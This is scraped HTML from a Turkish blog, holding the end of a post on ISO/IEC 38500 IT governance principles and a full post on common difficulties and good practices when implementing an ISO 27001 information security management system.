<td style="border-bottom: solid windowtext 1.0pt; border-left: none; border-right: solid windowtext 1.0pt; border-top: none; mso-border-bottom-alt: solid windowtext .5pt; mso-border-right-alt: solid windowtext .5pt; padding: 0cm 5.4pt 0cm 5.4pt; width: 76.3pt;" valign="top" width="127"><div class="MsoNormal" style="line-height: normal; margin-bottom: .0001pt; margin-bottom: 0cm; text-align: justify;">
<b><span style="font-family: "arial" , "helvetica" , sans-serif;">Değerlendir<o:p></o:p></span></b></div>
</td>
<td style="border-bottom: solid windowtext 1.0pt; border: none; mso-border-bottom-alt: solid windowtext .5pt; mso-border-left-alt: solid windowtext .5pt; mso-border-left-alt: solid windowtext .5pt; padding: 0cm 5.4pt 0cm 5.4pt; width: 382.0pt;" valign="top" width="637"><div class="MsoNormal" style="line-height: normal; margin-bottom: .0001pt; margin-bottom: 0cm; text-align: justify;">
<span style="font-family: "arial" , "helvetica" , sans-serif;">İş gereksinimlerinin karşılanması için gerekli
kabiliyet ve kapasite değerlendirilir.<o:p></o:p></span></div>
<div class="MsoNormal" style="line-height: normal; margin-bottom: .0001pt; margin-bottom: 0cm; text-align: justify;">
<span style="font-family: "arial" , "helvetica" , sans-serif;">Sürdürülen BT operasyonlarında risk
değerlendirmesi yapılır.<o:p></o:p></span></div>
<div class="MsoNormal" style="line-height: normal; margin-bottom: .0001pt; margin-bottom: 0cm; text-align: justify;">
<span style="font-family: "arial" , "helvetica" , sans-serif;">Bilgi bütünlüğü ve kurumsal bilgi ve yetenekler
dahil BT varlıklarının korunması için risk değerlendirmesi yapılır.<o:p></o:p></span></div>
<div class="MsoNormal" style="line-height: normal; margin-bottom: .0001pt; margin-bottom: 0cm; text-align: justify;">
<span style="font-family: "arial" , "helvetica" , sans-serif;">BT hedefleri ve yönetişim hedefleri
değerlendirilir.<o:p></o:p></span></div>
<div class="MsoNormal" style="line-height: normal; margin-bottom: .0001pt; margin-bottom: 0cm; text-align: justify;">
<span style="font-family: "arial" , "helvetica" , sans-serif;"><br /></span></div>
</td>
</tr>
<tr>
<td style="border-bottom: solid windowtext 1.0pt; border-left: none; border-right: solid windowtext 1.0pt; border-top: none; mso-border-bottom-alt: solid windowtext .5pt; mso-border-right-alt: solid windowtext .5pt; mso-border-top-alt: solid windowtext .5pt; mso-border-top-alt: solid windowtext .5pt; padding: 0cm 5.4pt 0cm 5.4pt; width: 76.3pt;" valign="top" width="127"><div class="MsoNormal" style="line-height: normal; margin-bottom: .0001pt; margin-bottom: 0cm; text-align: justify;">
<b><span style="font-family: "arial" , "helvetica" , sans-serif;">Yönlendir<o:p></o:p></span></b></div>
</td>
<td style="border-bottom: solid windowtext 1.0pt; border: none; mso-border-bottom-alt: solid windowtext .5pt; mso-border-left-alt: solid windowtext .5pt; mso-border-left-alt: solid windowtext .5pt; mso-border-top-alt: solid windowtext .5pt; mso-border-top-alt: solid windowtext .5pt; padding: 0cm 5.4pt 0cm 5.4pt; width: 382.0pt;" valign="top" width="637"><div class="MsoNormal" style="line-height: normal; margin-bottom: .0001pt; margin-bottom: 0cm; text-align: justify;">
<span style="font-family: "arial" , "helvetica" , sans-serif;">BT stratejilerinin başarılması için gerekli
kaynaklar atanır.<o:p></o:p></span></div>
<div class="MsoNormal" style="line-height: normal; margin-bottom: .0001pt; margin-bottom: 0cm; text-align: justify;">
<span style="font-family: "arial" , "helvetica" , sans-serif;">BT’yi yönlendiren iş hedeflerinin güncel ve
geçerli olması sağlanır.<o:p></o:p></span></div>
<div class="MsoNormal" style="line-height: normal; margin-bottom: .0001pt; margin-bottom: 0cm; text-align: justify;">
<span style="font-family: "arial" , "helvetica" , sans-serif;"><br /></span></div>
</td>
</tr>
<tr>
<td style="border-right: solid windowtext 1.0pt; border: none; mso-border-right-alt: solid windowtext .5pt; mso-border-top-alt: solid windowtext .5pt; mso-border-top-alt: solid windowtext .5pt; padding: 0cm 5.4pt 0cm 5.4pt; width: 76.3pt;" valign="top" width="127"><div class="MsoNormal" style="line-height: normal; margin-bottom: .0001pt; margin-bottom: 0cm; text-align: justify;">
<b><span style="font-family: "arial" , "helvetica" , sans-serif;">İzle<o:p></o:p></span></b></div>
</td>
<td style="border: none; mso-border-left-alt: solid windowtext .5pt; mso-border-top-alt: solid windowtext .5pt; padding: 0cm 5.4pt 0cm 5.4pt; width: 382.0pt;" valign="top" width="637"><div class="MsoNormal" style="line-height: normal; margin-bottom: .0001pt; margin-bottom: 0cm; text-align: justify;">
<span style="font-family: "arial" , "helvetica" , sans-serif;">BT’nin etkin kullanımı ve hedeflere uyumu
izlenir.<o:p></o:p></span></div>
<div class="MsoNormal" style="line-height: normal; margin-bottom: .0001pt; margin-bottom: 0cm; text-align: justify;">
<span style="font-family: "arial" , "helvetica" , sans-serif;"><br /></span></div>
</td>
</tr>
</tbody></table>
<div class="MsoNormal" style="text-align: justify;">
<br /></div>
<div class="MsoNormal" style="text-align: justify;">
<b><span style="font-family: "arial" , "helvetica" , sans-serif;"><br /></span></b></div>
<div class="MsoNormal" style="text-align: justify;">
<b><span style="font-family: "arial" , "helvetica" , sans-serif;">İlke 5 – Uyumluluk<o:p></o:p></span></b></div>
<div class="MsoNormal" style="text-align: justify;">
<b><span style="font-family: "arial" , "helvetica" , sans-serif;"><br /></span></b></div>
<table border="0" cellpadding="0" cellspacing="0" class="MsoTableGrid" style="border-collapse: collapse; border: none; mso-padding-alt: 0cm 5.4pt 0cm 5.4pt; mso-yfti-tbllook: 1184;">
<tbody>
<tr>
<td style="border-bottom: solid windowtext 1.0pt; border-left: none; border-right: solid windowtext 1.0pt; border-top: none; mso-border-bottom-alt: solid windowtext .5pt; mso-border-right-alt: solid windowtext .5pt; padding: 0cm 5.4pt 0cm 5.4pt; width: 76.3pt;" valign="top" width="127"><div class="MsoNormal" style="line-height: normal; margin-bottom: .0001pt; margin-bottom: 0cm; text-align: justify;">
<b><span style="font-family: "arial" , "helvetica" , sans-serif;">Değerlendir<o:p></o:p></span></b></div>
</td>
<td style="border-bottom: solid windowtext 1.0pt; border: none; mso-border-bottom-alt: solid windowtext .5pt; mso-border-left-alt: solid windowtext .5pt; mso-border-left-alt: solid windowtext .5pt; padding: 0cm 5.4pt 0cm 5.4pt; width: 382.0pt;" valign="top" width="637"><div class="MsoNormal" style="line-height: normal; margin-bottom: .0001pt; margin-bottom: 0cm; text-align: justify;">
<span style="font-family: "arial" , "helvetica" , sans-serif;">İç prosedürler, standartlar, profesyonel
rehberler ve düzenleyici kuruluşlarca tariflenen gereklilikler takip edilir.<o:p></o:p></span></div>
<div class="MsoNormal" style="line-height: normal; margin-bottom: .0001pt; margin-bottom: 0cm; text-align: justify;">
<span style="font-family: "arial" , "helvetica" , sans-serif;">Uyum durumu takip edilir.<b><o:p></o:p></b></span></div>
<div class="MsoNormal" style="line-height: normal; margin-bottom: .0001pt; margin-bottom: 0cm; text-align: justify;">
<span style="font-family: "arial" , "helvetica" , sans-serif;"><br /></span></div>
</td>
</tr>
<tr>
<td style="border-bottom: solid windowtext 1.0pt; border-left: none; border-right: solid windowtext 1.0pt; border-top: none; mso-border-bottom-alt: solid windowtext .5pt; mso-border-right-alt: solid windowtext .5pt; mso-border-top-alt: solid windowtext .5pt; mso-border-top-alt: solid windowtext .5pt; padding: 0cm 5.4pt 0cm 5.4pt; width: 76.3pt;" valign="top" width="127"><div class="MsoNormal" style="line-height: normal; margin-bottom: .0001pt; margin-bottom: 0cm; text-align: justify;">
<b><span style="font-family: "arial" , "helvetica" , sans-serif;">Yönlendir<o:p></o:p></span></b></div>
</td>
<td style="border-bottom: solid windowtext 1.0pt; border: none; mso-border-bottom-alt: solid windowtext .5pt; mso-border-left-alt: solid windowtext .5pt; mso-border-left-alt: solid windowtext .5pt; mso-border-top-alt: solid windowtext .5pt; mso-border-top-alt: solid windowtext .5pt; padding: 0cm 5.4pt 0cm 5.4pt; width: 382.0pt;" valign="top" width="637"><div class="MsoNormal" style="line-height: normal; margin-bottom: .0001pt; margin-bottom: 0cm; text-align: justify;">
<span style="font-family: "arial" , "helvetica" , sans-serif;">Uyum izleme mekanizmaları geliştirilir.<o:p></o:p></span></div>
<div class="MsoNormal" style="line-height: normal; margin-bottom: .0001pt; margin-bottom: 0cm; text-align: justify;">
<span style="font-family: "arial" , "helvetica" , sans-serif;">Kaynakların takibi için atamalar, görevlendirmeler
yapılır.<o:p></o:p></span></div>
<div class="MsoNormal" style="line-height: normal; margin-bottom: .0001pt; margin-bottom: 0cm; text-align: justify;">
<span style="font-family: "arial" , "helvetica" , sans-serif;">Tüm uygulamaların etik ve yasal olduğu garanti
edilir.<o:p></o:p></span></div>
<div class="MsoNormal" style="line-height: normal; margin-bottom: .0001pt; margin-bottom: 0cm; text-align: justify;">
<span style="font-family: "arial" , "helvetica" , sans-serif;"><br /></span></div>
</td>
</tr>
<tr>
<td style="border-right: solid windowtext 1.0pt; border: none; mso-border-right-alt: solid windowtext .5pt; mso-border-top-alt: solid windowtext .5pt; mso-border-top-alt: solid windowtext .5pt; padding: 0cm 5.4pt 0cm 5.4pt; width: 76.3pt;" valign="top" width="127"><div class="MsoNormal" style="line-height: normal; margin-bottom: .0001pt; margin-bottom: 0cm; text-align: justify;">
<b><span style="font-family: "arial" , "helvetica" , sans-serif;">İzle<o:p></o:p></span></b></div>
</td>
<td style="border: none; mso-border-left-alt: solid windowtext .5pt; mso-border-top-alt: solid windowtext .5pt; padding: 0cm 5.4pt 0cm 5.4pt; width: 382.0pt;" valign="top" width="637"><div class="MsoNormal" style="line-height: normal; margin-bottom: .0001pt; margin-bottom: 0cm; text-align: justify;">
<span style="font-family: "arial" , "helvetica" , sans-serif;">Belirli aralıklarla denetimler ve gözden
geçirmeler aracılığıyla uyum izlenir.<o:p></o:p></span></div>
<div class="MsoNormal" style="line-height: normal; margin-bottom: .0001pt; margin-bottom: 0cm; text-align: justify;">
<span style="font-family: "arial" , "helvetica" , sans-serif;">Dataların imhası da dahil olmak üzere tüm BT
uygulamalarının mevzuata uyumu takip edilir.<o:p></o:p></span></div>
<div class="MsoNormal" style="line-height: normal; margin-bottom: .0001pt; margin-bottom: 0cm; text-align: justify;">
<span style="font-family: "arial" , "helvetica" , sans-serif;"><br /></span></div>
</td>
</tr>
</tbody></table>
<div class="MsoNormal" style="text-align: justify;">
<br /></div>
<div class="MsoNormal" style="text-align: justify;">
<b><span style="font-family: "arial" , "helvetica" , sans-serif;"><br /></span></b></div>
<div class="MsoNormal" style="text-align: justify;">
<b><span style="font-family: "arial" , "helvetica" , sans-serif;">İlke 6 – İnsan Davranışı<o:p></o:p></span></b></div>
<div class="MsoNormal" style="text-align: justify;">
<b><span style="font-family: "arial" , "helvetica" , sans-serif;"><br /></span></b></div>
<table border="0" cellpadding="0" cellspacing="0" class="MsoTableGrid" style="border-collapse: collapse; border: none; mso-padding-alt: 0cm 5.4pt 0cm 5.4pt; mso-yfti-tbllook: 1184;">
<tbody>
<tr>
<td style="border-bottom: solid windowtext 1.0pt; border-left: none; border-right: solid windowtext 1.0pt; border-top: none; mso-border-bottom-alt: solid windowtext .5pt; mso-border-right-alt: solid windowtext .5pt; padding: 0cm 5.4pt 0cm 5.4pt; width: 76.3pt;" valign="top" width="127"><div class="MsoNormal" style="line-height: normal; margin-bottom: .0001pt; margin-bottom: 0cm; text-align: justify;">
<b><span style="font-family: "arial" , "helvetica" , sans-serif;">Değerlendir<o:p></o:p></span></b></div>
</td>
<td style="border-bottom: solid windowtext 1.0pt; border: none; mso-border-bottom-alt: solid windowtext .5pt; mso-border-left-alt: solid windowtext .5pt; mso-border-left-alt: solid windowtext .5pt; padding: 0cm 5.4pt 0cm 5.4pt; width: 382.0pt;" valign="top" width="637"><div class="MsoNormal" style="line-height: normal; margin-bottom: .0001pt; margin-bottom: 0cm; text-align: justify;">
<span style="font-family: "arial" , "helvetica" , sans-serif;">BT uygulamalarının birey davranışlarına uyumu
değerlendirilir.<o:p></o:p></span></div>
<div class="MsoNormal" style="line-height: normal; margin-bottom: .0001pt; margin-bottom: 0cm; text-align: justify;">
<span style="font-family: "arial" , "helvetica" , sans-serif;"><br /></span></div>
</td>
</tr>
<tr>
<td style="border-bottom: solid windowtext 1.0pt; border-left: none; border-right: solid windowtext 1.0pt; border-top: none; mso-border-bottom-alt: solid windowtext .5pt; mso-border-right-alt: solid windowtext .5pt; mso-border-top-alt: solid windowtext .5pt; mso-border-top-alt: solid windowtext .5pt; padding: 0cm 5.4pt 0cm 5.4pt; width: 76.3pt;" valign="top" width="127"><div class="MsoNormal" style="line-height: normal; margin-bottom: .0001pt; margin-bottom: 0cm; text-align: justify;">
<b><span style="font-family: "arial" , "helvetica" , sans-serif;">Yönlendir<o:p></o:p></span></b></div>
</td>
<td style="border-bottom: solid windowtext 1.0pt; border: none; mso-border-bottom-alt: solid windowtext .5pt; mso-border-left-alt: solid windowtext .5pt; mso-border-left-alt: solid windowtext .5pt; mso-border-top-alt: solid windowtext .5pt; mso-border-top-alt: solid windowtext .5pt; padding: 0cm 5.4pt 0cm 5.4pt; width: 382.0pt;" valign="top" width="637"><div class="MsoNormal" style="line-height: normal; margin-bottom: .0001pt; margin-bottom: 0cm; text-align: justify;">
<span style="font-family: "arial" , "helvetica" , sans-serif;">Risk ve fırsatlar da göz önüne alınarak birey
davranışlarına uygun BT uygulamaları desteklenir. Uyumun sağlanması ve
korunması için çalışmalar yürütülür.<o:p></o:p></span></div>
<div class="MsoNormal" style="line-height: normal; margin-bottom: .0001pt; margin-bottom: 0cm; text-align: justify;">
<span style="font-family: "arial" , "helvetica" , sans-serif;"><br /></span></div>
</td>
</tr>
<tr>
<td style="border-right: solid windowtext 1.0pt; border: none; mso-border-right-alt: solid windowtext .5pt; mso-border-top-alt: solid windowtext .5pt; mso-border-top-alt: solid windowtext .5pt; padding: 0cm 5.4pt 0cm 5.4pt; width: 76.3pt;" valign="top" width="127"><div class="MsoNormal" style="line-height: normal; margin-bottom: .0001pt; margin-bottom: 0cm; text-align: justify;">
<b><span style="font-family: "arial" , "helvetica" , sans-serif;">İzle<o:p></o:p></span></b></div>
</td>
<td style="border: none; mso-border-left-alt: solid windowtext .5pt; mso-border-top-alt: solid windowtext .5pt; padding: 0cm 5.4pt 0cm 5.4pt; width: 382.0pt;" valign="top" width="637"><div class="MsoNormal" style="line-height: normal; margin-bottom: .0001pt; margin-bottom: 0cm; text-align: justify;">
<span style="font-family: "arial" , "helvetica" , sans-serif;">Çalışma pratikleri ile BT uygulamalarının uyumu
izlenir.<o:p></o:p></span></div>
<div class="MsoNormal" style="line-height: normal; margin-bottom: .0001pt; margin-bottom: 0cm; text-align: justify;">
<span style="font-family: "arial" , "helvetica" , sans-serif;"><br /></span></div>
</td>
</tr>
</tbody></table>
<div class="MsoNormal" style="text-align: justify;">
<br /></div>
<div class="MsoNormal" style="text-align: justify;">
</div>
<div class="MsoNormal" style="text-align: justify;">
<span style="font-family: "arial" , "helvetica" , sans-serif;">Sonuç olarak ISO/IEC 38500
standardı bilgi teknolojilerinin etkin, verimli ve kabul edilebilir kullanımı
için ilkeleri ve BT yönetişim modelini tanımlamaktadır. Tanımlanan ilkelerin ve
modelin takip edilmesi, organizasyonun üst yönetimine risklerin dengelenmesi ve
bilgi teknolojilerinin oluşturduğu fırsatlardan istifade edilmesi için imkan
sağlar. BT yönetişimi, organizasyonun tabi olduğu regülatif ve sözleşmelerden
doğan yükümlülüklerin karşılanması konusunda güvence verir. Etkin BT yönetişimi
iş hedeflerinin başarılması ve iş hedefleri ile uyumlu BT süreçlerinin
oluşması, maliyet şeffaflığı, paydaşlarla etkin iş birliği, maliyetlerin
düşmesi ve yapılan yatırımların değere dönüşmesi, iş sürekliliğinin sağlanması, hizmetlerde ve pazarda yenilikçi
bir yaklaşımın ortaya çıkmasına imkan sağlar.</span></div>
<div class="MsoNormal" style="text-align: justify;">
<o:p></o:p></div>
Anonymousnoreply@blogger.com0tag:blogger.com,1999:blog-2815426134653926766.post-84967772775716393182017-05-12T10:00:00.000+03:002017-05-12T10:00:05.680+03:00ISO 27001 SİSTEM KURULUMU AŞAMASINDA KARŞILAŞILAN ZORLUKLAR VE DİKKAT EDİLMESİ GEREKEN HUSUSLAR<div class="MsoNormal" style="text-align: justify;">
ISO 27001 Bilgi Güvenliği Yönetim
Sistemi son yıllarda kurumlar tarafından oldukça talep gören bir standart
haline geldi. Bu talebin altında yasal gereklilikler, müşteri talepleri ve
kurumun stratejik hedefleri gibi çeşitli nedenler yatabilmekte. Ancak standarda
uygunluğun başarısında motivasyon ne olursa olsun bu sistemin uygulanması ve
işletiminde üst yönetim desteği en büyük payı almaktadır. Standart son
revizyonunda dahi yönetim desteğini ifade edebilmek için “Liderlik” maddesi
ortaya çıkmıştır. “Yönetime rağmen” yönetim sistemi kurmak ve işletmek sistemin
ömrünün kısa olmasına neden olacaktır. <o:p></o:p></div>
<div class="MsoNormal" style="text-align: justify;">
<br /></div>
<div class="MsoNormal" style="text-align: justify;">
Yönetim desteği ifadesi her zaman
maddi destek olarak algılanmamalıdır. Kurum bütçesine göre maddi destek ve
kaynağın önemi yadsınamaz ve olmazsa olmazdır ancak yönetimin kurum çalışanları
için motivasyon sağlayıcı davranışlar sergilemesi de başarı için oldukça
önemlidir. Proje başında yönetimin kurum çalışanlarından projeye destek
göstermelerini isteyen bilgilendirme mesajı paylaşması, sorumluluk ataması,
bazı toplantı ve eğitimlere katılım gösterip projenin önemini ifade etmesi gibi
hususlar çalışanlarda bu sistemin uygulanması konusunda motivasyon sağlamaktadır.
Belgelendirme amacı taşıyan kurumlar da bu ve benzeri durumları kayıt altına
alarak liderlik maddesi için kanıt oluşturmalıdırlar. Aynı zamanda yönetime
düzenli olarak raporlama yapılması, yönetimin sistemin içinde tutularak güncel
bilgilere sahip olmasını sağlayacaktır. <o:p></o:p></div>
<div class="MsoNormal" style="text-align: justify;">
<br /></div>
<div class="MsoNormal" style="text-align: justify;">
Kurumlar yatırım kararlarını
belirlerken bütçe planlamasına bilgi güvenliği ile ilgili konuları da dâhil
etmesi önemli olacaktır. <o:p></o:p></div>
<div class="MsoNormal" style="text-align: justify;">
<br /></div>
<div class="MsoNormal" style="text-align: justify;">
Yönetimden beklenen destek sağlanmazsa
çalışanlar üzerlerine düşen görevleri sahiplenmeyip sorumluluklarını
gerçekleştiremeyebilirler. Bu da yönetim sisteminin etkin şekilde işletilmesine
engel olabilecek sonuçlar doğurabilmektedir. <o:p></o:p></div>
<div class="MsoNormal" style="text-align: justify;">
<br /></div>
<div class="MsoNormal" style="text-align: justify;">
Yönetim sisteminin içerisinde yapılması
veya dikkat edilmesi gereken bir diğer husus; rol ve sorumlulukların doğru ve
tam olarak belirlenmesidir. Bu rol ve sorumluluklar gerek proje yöneticileri
gerekse de son kullanıcılar açısından doğru belirlenmelidir. Tanımlanmış olan
rol ve sorumlulukların yerine getirilmemesi başarıyı büyük ölçüde
etkileyecektir. Bu noktada tanımlanmış olan sorumlulukların yerine
getirilmemesi ve yerine getirmemenin doğuracağı sonuçlar için tanımlı bir süreç
oluşturulması ile eskalasyon yapısının işletilerek takip edilmesi, gereken
işlerin zamanında yapılması konusunda fayda sağlayacaktır. <o:p></o:p></div>
<div class="MsoNormal" style="text-align: justify;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
</div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://4.bp.blogspot.com/-vMlG76evbLU/WRL2viU0rWI/AAAAAAAAArg/bClzfO2v1ugzwZGEjEJKD6UCL-6bG5IvACLcB/s1600/Resim%2B3%252C5.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="145" src="https://4.bp.blogspot.com/-vMlG76evbLU/WRL2viU0rWI/AAAAAAAAArg/bClzfO2v1ugzwZGEjEJKD6UCL-6bG5IvACLcB/s640/Resim%2B3%252C5.png" width="640" /></a></div>
<br />
<span style="text-align: justify;"> </span><br />
<div class="MsoNormal" style="text-align: justify;">
ISO 27001 Bilgi Güvenliği Yönetim
Sistemi risk temelli bir yönetim sistemidir. Kurum için uygulanabilir bir risk
metodolojisinin oluşturulması kurumdaki herkes tarafından anlaşılıp sürdürülebilirliğinin
sağlanması adına büyük önem taşımaktadır. <o:p></o:p></div>
<div class="MsoNormal" style="text-align: justify;">
<br /></div>
<div class="MsoNormal" style="text-align: justify;">
Risk değerlendirmeleri sonucu risk
işleme kararlarına bağlı olarak aksiyon planlarında belirlenmiş olan
aksiyonların zamanında yapılması ve takip edilmesi, aynı zamanda bu aksiyonlar
için kaynak ayrılması risk yönetiminin başarısını sağlayacaktır. Risk
değerlendirme sonrasında alınacak risk işleme kararları için yönetim risk kabul
kriterleri doğrultusunda kabul edilebilir risk seviyesine karar vermelidir. Bu
seviyenin gelecek dönemlerde giderek düşürülmesi de sistemin daha iyi
seviyelere gelmesi açısından önemli olacaktır. <o:p></o:p></div>
<div class="MsoNormal" style="text-align: justify;">
<br /></div>
<div class="MsoNormal" style="text-align: justify;">
Risk değerlendirme ve işleme karalarının
sonucunda oluşturulması gereken sistemin daha iyi bir noktaya gelmesini
sağlayacak bilgi güvenliği amaçlarının sadece bilgi teknolojilerini
ilgilendiren amaçlar olmaması, her departman ile ilgili olabilecek amaçların da
belirlenmesi bilgi güvenliğinin sadece bilgi teknolojileri departmanına özel
bir uygulama olduğu düşüncesinin ortadan kaldırılmasını sağlayacaktır. Bilgi
güvenliği amaçlarının ölçülebilir ve gerçekleştirilebilir amaçlar olarak seçilmesi
sisteme faydalı olacaktır. <o:p></o:p></div>
<div class="MsoNormal" style="text-align: justify;">
<br /></div>
<div class="MsoNormal" style="text-align: justify;">
Bilgi güvenliği yönetim sisteminin
uygulanması ve işletilmesi konusunda proje yöneticileri ile birlikte her
çalışan için görev ve sorumlulukların belirlenmesi standart tarafından
istenmektedir. Bunun sağlanabilmesi için ihtiyaç olan yetkinliklerin doğru
belirlenerek iyi analiz edilmesi gerekmektedir. Eğitim takvimlerinin oluşturularak
yetkinliklerin arttırılması sağlanmalıdır. Ancak alınan eğitimlerin veya diğer
yetkinlik tanımlarının istenilen seviyeye gelip gelmediğinin kontrolü birçok
firmada göz ardı edilmektedir. Gerçekleştirilmiş olan işlemlerin ihtiyacı ve
beklentiyi karşılayıp karşılamadığının ilgili ve yetkili kişilerce
değerlendirmesinin yapılması gerekir.<o:p></o:p></div>
<div class="MsoNormal" style="text-align: justify;">
<br /></div>
<div class="MsoNormal" style="text-align: justify;">
Son kullanıcıların dikkat etmesi
gereken konular ile sorumluluklarının anlatıldığı farkındalık eğitimlerinin
ilgili taraf analizi sırasında ortaya çıkmış olan kapsam dâhilindeki her
çalışan ile birlikte kapsam dışında kalan çalışanlara da verilmesi oldukça
önemlidir. Farkındalık eğitimlerinin hedef kitlesi belirlenirken kurumların genellikle
gözden kaçırdığı stajyerler ve kurum içindeki ve dışındaki taşeronların da
eğitimlere dâhil edilmesi gerekmektedir. <o:p></o:p></div>
<div class="MsoNormal" style="text-align: justify;">
<br /></div>
<div class="MsoNormal" style="text-align: justify;">
Farkındalık eğitimleri sadece sınıf
eğitimi olarak değerlendirilmemelidir. Kişilere atanacak online eğitimler, verilecek
broşürler, düzenlenecek etkinlikler, ödül sistemleri gibi çözümler ile farklı
şekillerde farkındalık sağlanabilir. Farkındalık çalışmaları sonrasında bu
çalışmaların etkinliğinin değerlendirilmesi unutulmamalıdır. Bu değerlendirme sınav
olarak yapılabileceği gibi karşılıklı mülakatlar ile de yapılabilir. Önemli
olan çalışanların bir konu ile ilgili aynı ve doğru fikre sahip olmasının
sağlanmasıdır. <o:p></o:p></div>
<div class="MsoNormal" style="text-align: justify;">
<br /></div>
<div class="MsoNormal" style="text-align: justify;">
ISO 27001 Bilgi Güvenliği Yönetim
Sistemi standardı diğer ISO standartlarından farklı olarak 2 bölümden
oluşmaktadır. Standart ana maddelerine ek olarak hazırlanmış olan EK-A kontrol
maddeleri belirlenmiş kapsam ile ilgili olan kontrollerin seçilerek ilgisiz
olanların hariç bırakılmasını mümkün kılmaktadır. Örneğin kurum içinde BGYS
kapsamı dahilinde yazılım geliştirme yapılmıyorsa yazılım geliştirme ile ilgili
kontrol maddeleri hariç bırakılabilir. <o:p></o:p></div>
<div class="MsoNormal" style="text-align: justify;">
<br /></div>
<div class="MsoNormal" style="text-align: justify;">
Yönetim sisteminin başında kurum ile
ilgili olabilecek tüm tarafların doğru analiz edilmesi gerekmektedir. Bu analize
hem kurum içi hem de kurum dışındaki tüm tarafların dâhil edilmesi önemlidir.
Müşteriler, tedarikçiler, devlet ve düzenleyici kuruluşlar, çalışanlar,
paydaşlar, iş ortakları vb. ilgili tüm tarafların BGYS açısından ihtiyaç ve
beklentilerinin doğru analizi yönetim sisteminin kapsamının doğru
belirlenmesine ve işletilmesine fayda sağlayacaktır. <o:p></o:p></div>
<div class="MsoNormal" style="text-align: justify;">
<br /></div>
<div class="MsoNormal" style="text-align: justify;">
Yönetim sisteminin kapsamına karar
verilirken ilgili taraf analizinde ortaya çıkan tedarikçiler iş ihtiyacına
bağlı olarak hizmet sürekliliği açısından kritik olanlar için Hizmet Seviye Anlaşmaları
(SLA), bilgi paylaşımı konusunda kritik tedarikçiler için Gizlilik Sözleşmeleri
yada gizlilik maddeleri içeren Hizmet Sözleşmeleri yapılması gerekmektedir. Sözleşme
yapılma ihtiyacı doğru belirlenmelidir. Örneğin kurum ofis sarf malzemeleri
alımı yaptığı bir firma ile sözleşme imzalama ihtiyacı duymayabilir. Gizli
bilgi paylaşımı yapılmamakta ve alternatif tedarikçiler bulunabildiği için
kritik tedarikçi sınıfında olmayabilir. Ancak kurum içinde tedarikçiler
tarafından sağlanan yemek, servis, temizlik gibi hizmetler için mutlaka
gizlilik sözleşmeleri yada gizlilik maddeleri içeren hizmet sözleşmeleri
yapılmalıdır. <o:p></o:p></div>
<div class="MsoNormal" style="text-align: justify;">
<br /></div>
<div class="MsoNormal" style="text-align: justify;">
Tedarikçi sözleşmelerinin yapılması
her zaman kurumun inisiyatifinde olamayabilir. Tedarikçiler sözleşme
koşullarından ötürü sözleşmenin düzenlenmesi taraftarı olmayabilirler. Kurum bu noktada sözleşme şartlarını değiştirerek
sözleşme yapılmasını teşvik edebilir. Ancak yine de sözleşmenin düzenlenmesi
mümkün olamayabilir. Sözleşmelerde dikkat edilmesi gereken tedarikçi ile gizli
bilgi paylaşımının yapılıp yapılmadığı, hizmet sürekliliği açısından
kritikliği, alternatif tedarikçi mevcudiyeti gibi konulardır. <o:p></o:p></div>
<div class="MsoNormal" style="text-align: justify;">
<br /></div>
<div class="MsoNormal" style="text-align: justify;">
Tedarikçilerden alınan hizmetlere göre
ihtiyaçlar doğrultusunda kriterler belirlenmeli ve periyodik olarak hizmet değerlendirmelerinin
yapılması gerekmektedir. <o:p></o:p></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://1.bp.blogspot.com/-kftnPJIFj6k/WRL1axaCQHI/AAAAAAAAArQ/FwpDbOu4dtgif9hX-6n4gHt7186JERp6wCLcB/s1600/resim%2B1.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="226" src="https://1.bp.blogspot.com/-kftnPJIFj6k/WRL1axaCQHI/AAAAAAAAArQ/FwpDbOu4dtgif9hX-6n4gHt7186JERp6wCLcB/s400/resim%2B1.png" width="400" /></a></div>
<div class="MsoNormal" style="text-align: justify;">
<br /></div>
<div align="center" class="MsoNormal" style="text-align: center;">
<br /></div>
<div class="MsoNormal" style="text-align: justify;">
Bilgi güvenliğinin sağlanabilmesi için
uygulanacak olan teknik kontrollerin yürütülmesi için büyük yatırımların
gerçekleştirilmesi standart tarafından şart koşulmamaktadır. Teknik kontrol uygulamaları
hususunda birçok kurum için akla gelen ilk soru ciddi maddi kaynak yatırımının
gerekli olup olmadığıdır. Bu konu tamamen üst yönetimin risk iştahına ve
süreçlerin işletilebilmesi ve iyileştirilebilmesi için ihtiyaç duyulan hizmet
ve kaynaklara bağlıdır. Standart hiçbir zaman bir ürün ya da hizmetin kullanımını
zorunlu tutmamaktadır. Piyasa içerisinde ihtiyaç duyulan hizmetler için hem
ücretli hem de ücretsiz uygulamalar ile farklı çözüm yolları bulunabilmektedir.
Dikkat edilmesi gereken şey iş süreçlerinin yönetiminin etkin ve verimli
olmasını sağlayacak çözümün bulunmasıdır. İhtiyaçların doğru belirlenerek karar
verilmesi bu süreçte büyük önem taşımaktadır.</div>
<div class="MsoNormal" style="text-align: justify;">
<br /></div>
<div class="MsoNormal" style="text-align: justify;">
ISO 27001 Bilgi Güvenliği Yönetim
Sistemi, standart gereklilikleri doğrultusunda “yaptığını yaz, yazdığını yap
mantığı” ile işletilebilir. Yönetim sisteminin ilk kurulduğu dönemlerde
dirençle karşılaşılabilmektedir. Gerçekleştirilecek olan aksiyonlar ve alınan
kararlar çalışanların motivasyonunu etkileyebilmektedir. Bu noktada ihtiyaç
doğru belirlenerek çalışanlara doğru aktarılmalıdır. Çok sıkı kontroller ile
tasarlanan süreçler yönetim sisteminin başarısına engel olabilir. Bu şekilde
yönetilen sistemler bir süre sonra işletilemez hale gelebilmektedir. </div>
<div class="MsoNormal" style="text-align: justify;">
<o:p></o:p></div>
Anonymoushttp://www.blogger.com/profile/12528360915688896342noreply@blogger.com0